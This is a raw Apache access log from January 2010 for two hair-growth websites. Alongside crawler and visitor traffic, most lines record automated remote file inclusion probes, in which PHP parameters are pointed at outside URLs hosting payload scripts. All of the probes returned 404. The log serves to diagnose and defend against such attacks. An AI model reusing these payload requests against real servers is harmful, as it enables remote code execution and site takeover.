189.108.236.148 - - [13/Jan/2010:07:13:44 -0800] "GET /logs//index.php?_REQUEST=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
38.101.148.126 - - [13/Jan/2010:07:17:26 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [13/Jan/2010:07:17:29 -0800] "GET /freehairsecretsphp/viewtopic.php?p=10170 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [13/Jan/2010:07:17:35 -0800] "GET /freehairsecretsphp/viewtopic.php?p=18967 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
121.149.207.114 - - [13/Jan/2010:07:26:37 -0800] "GET /logs//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [13/Jan/2010:07:26:37 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [13/Jan/2010:07:26:37 -0800] "GET /administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.55.106.179 - - [13/Jan/2010:07:29:45 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.growlonghairfast.com"
125.160.17.200 - - [13/Jan/2010:07:30:22 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:30:22 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:30:22 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.249.65.112 - - [13/Jan/2010:07:30:55 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
65.55.106.179 - - [13/Jan/2010:07:31:03 -0800] "GET /SecretsforFasterHairGrowth3.htm HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.growlonghairfast.com"
121.149.207.114 - - [13/Jan/2010:07:31:44 -0800] "GET /logs//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [13/Jan/2010:07:31:44 -0800] "GET /administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [13/Jan/2010:07:31:44 -0800] "GET /logs/access_091005.log%20%20//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:31:56 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:31:56 -0800] "GET /addpost_newpoll.php?addpoll=preview&thispath=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:31:57 -0800] "GET /logs/access.log%20%20//addpost_newpoll.php?addpoll=preview&thispath=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:32:05 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:32:12 -0800] "GET /logs/access.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:32:12 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:32:22 -0800] "GET /logs//header.php?abspath=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:32:22 -0800] "GET /logs/access.log%20%20//header.php?abspath=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:32:22 -0800] "GET /header.php?abspath=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:33:05 -0800] "GET /zipndownload.php?PP_PATH=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:33:05 -0800] "GET /logs/access.log%20%20//zipndownload.php?PP_PATH=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:33:05 -0800] "GET /logs//zipndownload.php?PP_PATH=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.54.154.10 - - [13/Jan/2010:07:41:08 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
200.54.154.10 - - [13/Jan/2010:07:41:09 -0800] "GET /skin/zero_vote/error.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
200.54.154.10 - - [13/Jan/2010:07:41:10 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
218.145.66.236 - - [13/Jan/2010:07:41:24 -0800] "GET /logs/access_091005.log%20%20//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.66.236 - - [13/Jan/2010:07:41:25 -0800] "GET /administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.66.236 - - [13/Jan/2010:07:41:25 -0800] "GET /logs//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.54.154.10 - - [13/Jan/2010:07:47:11 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
200.54.154.10 - - [13/Jan/2010:07:47:12 -0800] "GET /skin/zero_vote/error.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
200.54.154.10 - - [13/Jan/2010:07:47:13 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
195.2.240.202 - - [13/Jan/2010:07:51:07 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows ME) Opera 7.11 [en]" "growlonghairfast.com"
195.2.240.202 - - [13/Jan/2010:07:51:08 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows ME) Opera 7.11 [en]" "growlonghairfast.com"
189.74.220.82 - - [13/Jan/2010:07:53:37 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.74.220.82 - - [13/Jan/2010:07:53:37 -0800] "GET /skin/zero_vote/error.php?dir=http://johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.74.220.82 - - [13/Jan/2010:07:53:37 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:53:54 -0800] "GET /logs//main.php?sayfa=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:53:54 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.160.17.200 - - [13/Jan/2010:07:53:54 -0800] "GET /main.php?sayfa=http://220.130.227.23//appserv/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [13/Jan/2010:07:59:05 -0800] "GET /skin/zero_vote/ask_password.php?dir' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.253.25.15 - - [13/Jan/2010:07:59:05 -0800] "GET /skin/zero_vote/ask_password.php?dir' HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
189.74.220.82 - - [13/Jan/2010:08:03:57 -0800] "GET /logs/access.log%20%20//login.php?dir=http://johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.74.220.82 - - [13/Jan/2010:08:03:57 -0800] "GET /login.php?dir=http://johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.74.220.82 - - [13/Jan/2010:08:03:57 -0800] "GET /logs//login.php?dir=http://johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.2.240.202 - - [13/Jan/2010:08:05:02 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "freehairsecrets.com"
195.2.240.202 - - [13/Jan/2010:08:05:03 -0800] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "freehairsecrets.com"
74.200.89.25 - - [13/Jan/2010:08:06:38 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
216.230.81.91 - - [13/Jan/2010:08:09:34 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Trillian/4.0" "freehairsecrets.com"
74.200.89.25 - - [13/Jan/2010:08:13:20 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
74.200.89.25 - - [13/Jan/2010:08:13:20 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
74.200.89.25 - - [13/Jan/2010:08:13:20 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
115.68.3.220 - - [13/Jan/2010:08:31:29 -0800] "GET /logs/access.log%20%20///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://drhello.com/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
115.68.3.220 - - [13/Jan/2010:08:31:29 -0800] "GET //administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://drhello.com/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
115.68.3.220 - - [13/Jan/2010:08:31:29 -0800] "GET /logs///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://drhello.com/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.115.187 - - [13/Jan/2010:08:31:51 -0800] "GET /freehairsecretsphp/viewtopic.php?p=11412 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
115.68.3.220 - - [13/Jan/2010:08:32:49 -0800] "GET /logs/access.log///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://drhello.com/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.23.145.228 - - [13/Jan/2010:08:34:44 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "growlonghairfast.com"
94.23.145.228 - - [13/Jan/2010:08:34:44 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "growlonghairfast.com"
203.253.25.15 - - [13/Jan/2010:08:34:45 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.erotik-hille.de/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [13/Jan/2010:08:34:45 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.erotik-hille.de/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [13/Jan/2010:08:34:45 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.erotik-hille.de/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [13/Jan/2010:08:39:36 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.erotik-hille.de/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [13/Jan/2010:08:39:36 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.erotik-hille.de/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [13/Jan/2010:08:39:36 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.erotik-hille.de/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [13/Jan/2010:08:40:20 -0800] "GET /logs/access_091005.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.erotik-hille.de/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.111.74 - - [13/Jan/2010:08:41:33 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.111.74 - - [13/Jan/2010:08:41:33 -0800] "GET /logs/access_091005.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.111.74 - - [13/Jan/2010:08:41:33 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.111.74 - - [13/Jan/2010:08:41:33 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.111.74 - - [13/Jan/2010:08:41:33 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.111.74 - - [13/Jan/2010:08:41:33 -0800] "GET /logs/access_091005.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.111.74 - - [13/Jan/2010:08:41:33 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.111.74 - - [13/Jan/2010:08:41:33 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.55.51.10 - - [13/Jan/2010:08:46:22 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "growlonghairfast.com"
65.55.51.10 - - [13/Jan/2010:08:46:23 -0800] "GET /freehairsecretsphp/viewtopic.php?p=16503 HTTP/1.1" 200 349 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "growlonghairfast.com"
203.253.25.15 - - [13/Jan/2010:08:49:24 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.erotik-hille.de/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [13/Jan/2010:08:49:24 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.erotik-hille.de/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [13/Jan/2010:08:49:24 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.erotik-hille.de/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [13/Jan/2010:08:49:38 -0800] "GET /logs/access_091005.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.erotik-hille.de/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.191.144.32 - - [13/Jan/2010:08:50:31 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.191.144.32 - - [13/Jan/2010:08:50:31 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.191.144.32 - - [13/Jan/2010:08:50:31 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.60.4.66 - - [13/Jan/2010:08:55:29 -0800] "GET /logs/access.log%20%20//write.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.60.4.66 - - [13/Jan/2010:08:55:29 -0800] "GET /logs//write.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.60.4.66 - - [13/Jan/2010:08:55:34 -0800] "GET /write.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [13/Jan/2010:08:57:59 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.erotik-hille.de/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [13/Jan/2010:08:57:59 -0800] "GET /logs/access_091005.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.erotik-hille.de/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [13/Jan/2010:08:57:59 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.erotik-hille.de/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.60.4.66 - - [13/Jan/2010:08:58:56 -0800] "GET /logs/access.log%20%20//write.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.60.4.66 - - [13/Jan/2010:08:58:56 -0800] "GET /logs//write.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.60.4.66 - - [13/Jan/2010:08:58:56 -0800] "GET /write.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.191.144.32 - - [13/Jan/2010:08:59:05 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.191.144.32 - - [13/Jan/2010:08:59:05 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.191.144.32 - - [13/Jan/2010:08:59:05 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.130.149.241 - - [13/Jan/2010:09:00:01 -0800] "GET /logs/access.log%20%20//write.php?dir=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.130.149.241 - - [13/Jan/2010:09:00:01 -0800] "GET /logs//write.php?dir=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.130.149.241 - - [13/Jan/2010:09:00:01 -0800] "GET /write.php?dir=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [13/Jan/2010:09:04:57 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.erotik-hille.de/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
89.107.104.99 - - [13/Jan/2010:09:07:37 -0800] "GET /freehairsecretsphp/viewtopic.php?p=568&sid=a6f0f582f22fe24d6101fc64e36d2027 HTTP/1.0" 200 438 "http://growlonghairfast.com/freehairsecretsphp/viewtopic.php?p=568&sid=a6f0f582f22fe24d6101fc64e36d2027" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
89.107.104.99 - - [13/Jan/2010:09:07:37 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
124.0.94.62 - - [13/Jan/2010:09:10:55 -0800] "GET /logs//zero_vote//login.php?dir=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.0.94.62 - - [13/Jan/2010:09:10:55 -0800] "GET /zero_vote//login.php?dir=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.0.94.62 - - [13/Jan/2010:09:10:55 -0800] "GET /logs/access.log%20%20//zero_vote//login.php?dir=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.108.83.106 - - [13/Jan/2010:09:13:37 -0800] "GET /logs/access.log%20%20///skin/ggambo7002_board/setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.108.83.106 - - [13/Jan/2010:09:13:37 -0800] "GET //skin/ggambo7002_board/setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.108.83.106 - - [13/Jan/2010:09:13:37 -0800] "GET /logs///skin/ggambo7002_board/setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.60.4.66 - - [13/Jan/2010:09:15:06 -0800] "GET /logs/access.log//write.php?dir=http://www.sudsalent